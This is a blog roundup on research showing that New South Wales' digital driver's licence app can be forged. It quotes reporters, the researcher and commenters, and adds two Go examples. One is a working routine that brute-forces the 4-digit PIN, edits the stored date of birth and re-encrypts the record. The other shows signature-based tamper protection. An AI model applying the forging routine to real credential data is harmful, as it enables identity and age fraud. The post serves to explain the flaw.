Digital Driver’s License Fails Spectacularly — ‘Laughably Easy’ to Forge

Is your state implementing a digital driver’s license? You’d better hope it does better than the Australian state of New South Wales.

Researchers show NSW’s mobile app is ridiculously insecure. Want to drink underage? Bloody oath! Want to steal someone’s identity? No wukkas, mate.

What a bunch of galahs. In today’s SB Blogwatch, we pop out in the ute and drive to woop woop.

Your humble blogwatcher curated these bloggy bits for your entertainment. Not to mention: Elon is wrong.

ServiceNSW’s Reaction was NSFW

What’s the craic? Erin Marquis reports—“Digital Drivers Licenses Are Hilariously Easy to Forge”:

Four million Australians use this app every day
The U.S. is just beginning to experiment with digital driver’s licenses … (despite public comments worrying that the licenses were the “mark of the beast”). … New South Wales in Australia, however, started offering such licenses in late 2019. [But they] are not as airtight as promised.

They’re laughably easy to hack, even by an unsophisticated, casual fraud. [You] can change any data [you] want. … All you need is an average, off-the-shelf PC and a widely-available PIN-breaking script.

Around four million Australians use this app every day as their preferred form of government identification.

And Dan Goodin adds in—“‘Tough to Forge’ Digital Driver’s Licenses Are—Yep—Easy to Forge”:

A variety of design flaws
The new licenses allowed people to use their iPhone or Android device to show proof of identity and age during roadside police checks or at bars, stores, hotels, and other venues. ServiceNSW, as the government body is usually referred to, promised it would “provide additional levels of security and protection against identity fraud,” [and] that security was a key priority.

[But] security researchers have shown that it’s trivial for just about anyone to forge fake identities. [It] allows people under drinking age to change their date of birth and for fraudsters to forge fake identities. … A variety of design flaws make this simple hack possible:

    • A lack of adequate encryption. …
    • Astonishingly, DDL data is never validated against the back-end database. …
    • Using the “pull-to-refresh” function … fails to refresh any of the data. …
    • The app allows the data it stores to be backed up, [edited] and restored.

Horse’s mouth? Noah Farmer reaps what he sows—“Digital Drivers Licence Security appears to be Super Bad”:

False sense of trust
Upon its initial trial launch, the security of the Digital Driver Licence was to no one’s surprise scrutinised by the public and there were multiple issues & security recommendations called out. One example is when a researcher … presented his findings at Pycon AU 2019 [and] demonstrated that he was able to modify Digital Driver Licence details locally on the mobile device in order to show false information. … It is unclear if this bug was considered an accepted risk or if remediation was ever attempted by ServiceNSW.

On iOS, the Digital Driver Licence data is stored in a JSON file … encrypted using AES-256-CBC encryption combined with Base64 encoding. A 4-digit application PIN … is the encryption password [which you] could easily brute-force. … Anyone wanting to commit fraud can modify their licence details without needing to jailbreak their device. … The application has no native method to validate the Digital Driver Licence data that exists on the phone and thus cannot [test if] this data has been modified. … When an unsuspecting victim scans the fraudster's QR code, everything will check out.

With this overall lack of secure design, licence features such as QR code scanning, the animated NSW Government logo, last refreshed time (and swipe-to-refresh), animated Waratah hologram, licence photo watermark, horizontal view, and others appear exactly as if the licence was genuine, creating a false sense of trust.

ELI5? Zak3056 explains like we’re five:

The data is stored in an encrypted file whose key is a four digit PIN (i.e., 10,000 combinations at most required to decrypt). … Once decrypted, the data is in a text file that is trivially edited, reencrypted, and reuploaded to the device.
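
Zak3056's four steps, as an added worked example (this is not code from ServiceNSW, from the researchers, or from this post): Go, standard library only. The licence record, its field names and the PIN 4821 are constructed for the example; the app's exact on-device layout is not published here, so the key derivation (SHA-256 of the PIN) and the blob format (random IV prepended, then Base64) are assumptions, and any reasonable alternative leaves the attack unchanged because the search space is still 10,000 PINs.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
)

// SampleLicence is a constructed stand-in for the JSON record the app keeps on
// the phone; the field names are invented for this example.
const SampleLicence = `{"name":"Jane Citizen","dateOfBirth":"2006-03-15","licenceNo":"12345678"}`

// deriveKey turns the 4-digit PIN into a 256-bit AES key. SHA-256(PIN) is an
// assumption; a slow KDF such as PBKDF2 raises the cost per guess, not the count.
func deriveKey(pin string) []byte {
	sum := sha256.Sum256([]byte(pin))
	return sum[:]
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1]) // callers guarantee len(b) >= aes.BlockSize
	if n == 0 || n > aes.BlockSize || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, fmt.Errorf("bad padding")
	}
	return b[:len(b)-n], nil
}

// EncryptLicence mimics the assumed on-device format: AES-256-CBC, IV prepended, Base64.
func EncryptLicence(pin string, plaintext []byte) (string, error) {
	block, _ := aes.NewCipher(deriveKey(pin)) // 32-byte key, cannot fail
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	padded := pkcs7Pad(plaintext)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(append(iv, ct...)), nil
}

func DecryptLicence(pin, blob string) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(blob)
	if err != nil || len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("malformed blob")
	}
	block, _ := aes.NewCipher(deriveKey(pin))
	pt := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(pt, raw[aes.BlockSize:])
	return pkcs7Unpad(pt)
}

// BruteForcePIN tries all 10,000 PINs. Valid padding alone is a weak oracle (a wrong
// key passes it about 1 time in 256), so a guess only counts if the plaintext is JSON.
func BruteForcePIN(blob string) (pin string, plaintext []byte, ok bool) {
	for i := 0; i < 10000; i++ {
		pin = fmt.Sprintf("%04d", i)
		if pt, err := DecryptLicence(pin, blob); err == nil && json.Valid(pt) {
			return pin, pt, true
		}
	}
	return "", nil, false
}

// ForgeDOB recovers the PIN, edits dateOfBirth and re-encrypts under the same PIN.
func ForgeDOB(blob, newDOB string) (string, error) {
	pin, pt, ok := BruteForcePIN(blob)
	if !ok {
		return "", fmt.Errorf("PIN not found")
	}
	var lic map[string]any
	if err := json.Unmarshal(pt, &lic); err != nil {
		return "", err
	}
	lic["dateOfBirth"] = newDOB
	edited, _ := json.Marshal(lic)
	return EncryptLicence(pin, edited)
}

func main() {
	blob, _ := EncryptLicence("4821", []byte(SampleLicence))
	forged, _ := ForgeDOB(blob, "1990-01-01")
	pt, _ := DecryptLicence("4821", forged)
	fmt.Printf("forged record decrypts under the user's PIN: %s\n", pt)
}
```

The point of the JSON check in `BruteForcePIN` is that the attacker does not need any oracle from the app: a PIN-keyed AES file carries its own "did this decrypt?" signal in its padding and structure. Nothing in the forged blob distinguishes it from the original, which is exactly why the app's logo animations and refresh timestamps prove nothing.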

A four-digit PIN as an encryption key? millebi waxes excoriating:

So, has nobody in NSW heard about digital signatures that use a public key? It would have allowed verification offline and tamper resistance and all phones would have the public key to verify but not the private key to encrypt. … Talk about a 1980s solution!
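
What millebi describes, as an added worked example (not code from ServiceNSW, the researchers, or this post): the issuer signs the record with a private key it never ships; the phone and every verifier hold only the public key, check offline, and an edited date of birth no longer matches the signature. Go standard library, Ed25519 chosen for the example; the record layout and field names are constructed.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"fmt"
)

// Licence is the issuer's record. Field names are constructed for this example.
type Licence struct {
	Name        string `json:"name"`
	DateOfBirth string `json:"dateOfBirth"`
	LicenceNo   string `json:"licenceNo"`
}

// SignedLicence is what the phone would store: the record and the issuer's
// signature over its encoding. Anyone can read it; only the issuer can re-sign it.
type SignedLicence struct {
	Payload   []byte
	Signature []byte
}

// IssueLicence runs at the issuer, the only place the private key exists.
func IssueLicence(priv ed25519.PrivateKey, lic Licence) (SignedLicence, error) {
	payload, err := json.Marshal(lic)
	if err != nil {
		return SignedLicence{}, err
	}
	return SignedLicence{Payload: payload, Signature: ed25519.Sign(priv, payload)}, nil
}

// VerifyLicence runs anywhere (phone, bar, roadside) with only the public key,
// fully offline, and yields the record only if it is byte-for-byte what was signed.
func VerifyLicence(pub ed25519.PublicKey, sl SignedLicence) (Licence, bool) {
	if !ed25519.Verify(pub, sl.Payload, sl.Signature) {
		return Licence{}, false
	}
	var lic Licence
	if err := json.Unmarshal(sl.Payload, &lic); err != nil {
		return Licence{}, false
	}
	return lic, true
}

// TamperDOB is the edit-the-stored-file move from the quotes above, applied to
// a signed record: the payload changes but the signature cannot be recomputed.
func TamperDOB(sl SignedLicence, newDOB string) SignedLicence {
	var lic Licence
	_ = json.Unmarshal(sl.Payload, &lic)
	lic.DateOfBirth = newDOB
	edited, _ := json.Marshal(lic)
	return SignedLicence{Payload: edited, Signature: sl.Signature}
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	signed, _ := IssueLicence(priv, Licence{Name: "Jane Citizen", DateOfBirth: "2006-03-15", LicenceNo: "12345678"})
	_, genuine := VerifyLicence(pub, signed)
	_, forged := VerifyLicence(pub, TamperDOB(signed, "1990-01-01"))
	fmt.Println("genuine verifies:", genuine, "| forged verifies:", forged)
}
```

A signature fixes the tampering problem and nothing else: it does not bind the record to the device or to the person presenting it, it does not stop a genuine record being copied and replayed, and it discloses every field at once. Those are the gaps the ISO 18013-5 design quoted further down addresses with device-bound keys and selective disclosure, on top of issuer signing.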

How could this possibly happen? MpVpRb knows:

Real crypto security is hard—really hard. And only a very few know how to do it. Government officials who pay for stuff like this are clueless and have no way to guarantee that the stuff they buy actually works. Semi-competent security companies see a pot of gold.

ikr? And Denton Scratch agrees:

That sounds amazingly incompetent. I’m … disinclined to trust software developed by government departments (or their contractors). I’ve worked in that particular sausage factory, and it put me off sausages.

It turns out there’s an ISO standard for exactly this problem, as swillden notes:

Just implement the ISO 18013-5 standard, which has well-designed security, is careful to ensure that you never have to hand anyone your phone, and is also very careful about other aspects of privacy, taking care to ensure that license presentations aren’t inherently linkable and that data minimization is possible (you can provide only the information required, e.g., if you’re buying alcohol you can prove that you’re over 21 without providing any other information).

I know because I designed the ISO 18013-5 crypto security protocol (though the final version isn’t exactly what I designed—it was slightly improved by cryptographers from NIST, Google and Apple). This ISO standard is what Apple implemented recently, BTW, and what Android launched support for in 2019. It’s actually very well done, and the security has been thoroughly reviewed.

I wonder why Paul S. declines to give his full name:

Various Australian states have been blundering around with digital/smart-card driver’s licenses for at least ten years, wasting tens and possibly hundreds of millions of dollars on projects that their techs told them from the start could never work. … There’s an IT failure book in there waiting to be written once I retire and don’t have to worry about work-related consequences any more.

I was involved with the Queensland fiasco. … Trying to tell the mgt. that issuing certificates on an IBM mainframe stored in ISAM files talking to Java connectors with … ohgodohgod I’m getting horror flashbacks.

Meanwhile, what have we learned? HiredGoons goes all pedagogical on us:

Trying to brand your technology as unhackable is a surefire way to ensure it gets hacked.

And Finally:

“Absolute trainwreck”

CWs: Musk, a few F-bombs, Hitchhiker’s Guide echoes

You have been reading SB Blogwatch by Richi Jennings. Richi curates the best bloggy bits, finest forums, and weirdest websites … so you don’t have to. Hate mail may be directed to @RiCHi or [email protected]. Ask your doctor before reading. Your mileage may vary. E&OE. 30.

Image sauce: ServiceNSW

Richi Jennings

Richi Jennings is a foolish independent industry analyst, editor, and content strategist. A former developer and marketer, he’s also written or edited for Computerworld, Microsoft, Cisco, Micro Focus, HashiCorp, Ferris Research, Osterman Research, Orthogonal Thinking, Native Trust, Elgan Media, Petri, Cyren, Agari, Webroot, HP, HPE, NetApp on Forbes and CIO.com. Bizarrely, his ridiculous work has even won awards from the American Society of Business Publication Editors, ABM/Jesse H. Neal, and B2B Magazine.
